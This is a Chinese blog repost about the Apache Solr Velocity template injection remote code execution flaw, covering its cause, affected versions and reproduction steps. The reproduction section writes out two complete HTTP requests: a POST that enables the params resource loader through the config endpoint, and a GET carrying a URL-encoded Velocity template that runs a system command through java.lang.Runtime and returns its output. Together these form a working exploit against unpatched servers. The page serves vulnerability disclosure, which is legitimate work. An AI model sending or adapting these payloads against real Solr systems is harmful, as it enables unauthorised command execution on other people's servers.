热门标签
热门文章
- 1Docker-Compose快速入门及实践_docker-compose 实践 详解
- 2Spring MVC+ Spring + Mybatis “三大框架”介绍_spring,springmvc,mybatis三大框架‘
- 3一线大厂的程序员职级对标
- 4Leetcode 23. 合并K个排序链表_leetcode 23:合并 k 个排序链表
- 5深拷贝和浅拷贝的区别及实现方法_深拷贝浅拷贝的实现方式和区别
- 6【从零开始玩量化14】如何获取申万行业数据_免费申万行业指数历史数据下载
- 7Linux怎么解决更改xx权限:不允许的操作_chmod 不允许的操作
- 8批处理常用命令及用法大全
- 9模型部署系列:10x速度提升,Yolov8检测模型稀疏化——CPU上超500FPS_yolov8 提升帧率
- 10HarmonyOS学习路之开发篇—AI功能开发(词性标注)
当前位置: article > 正文
Apache Solr Velocity 远程命令执行漏洞_velocity 命令执行
作者:键盘狂人 | 2024-02-04 12:52:03
赞
踩
velocity 命令执行
漏洞背景
近日,国外安全研究员s00py公开了一个Apache Solr的Velocity模板注入的漏洞,可进行远程代码执行。
漏洞成因
Apache-Solr默认集成VelocityResponseWriter插件,该插件初始化参数中的 params.resource.loader.enabled 用来控制是否允许参数资源加载器在Solr请求参数中指定模版,默认设置是 false。攻击者通过POST请求直接将params.resource.loader.enabled修改为true。经过精心构造代码发送GET请求造成远程代码执行漏洞
影响版本
影响Apache Solr多个版本,包括最新版 8.2.0
漏洞复现
获取core名称
首先需要获取solr服务中的core名称,才可以执行攻击,可以从logging和core admin中获取
加载指定资源
通过POST请求把params.resource.loader.enabled设置为True,此时用户就可以加载指定资源,也就是构造一个能执行命令的恶意请求。
POST /solr/core名称/config HTTP/1.1 Host: ip:8983 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3 Referer: http://ip/solr/ Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 259 { "update-queryresponsewriter": { "startup": "lazy", "name": "velocity", "class": "solr.VelocityResponseWriter", "template.base.dir": "", "solr.resource.loader.enabled": "true", "params.resource.loader.enabled": "true" } }
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
- 13
- 14
- 15
- 16
- 17
- 18
- 19
- 20
- 21
- 22
远程命令执行
精心构造恶意代码,通过GET请求就可以远程执行命令了
GET /solr/core名称/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27whoami%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end HTTP/1.1
Host: ip:8983
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Referer: http://ip/solr/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 0
- 1
- 2
- 3
- 4
- 5
- 6
- 7
- 8
- 9
- 10
- 11
- 12
修复建议
目前,官方尚未发布相关漏洞的安全补丁,请及时关注官方更新
官网链接
参考链接
https://github.com/wyzxxz/Apache_Solr_RCE_via_Velocity_template
https://nosec.org/home/detail/3113.html
声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/article/detail/58635
推荐阅读
相关标签
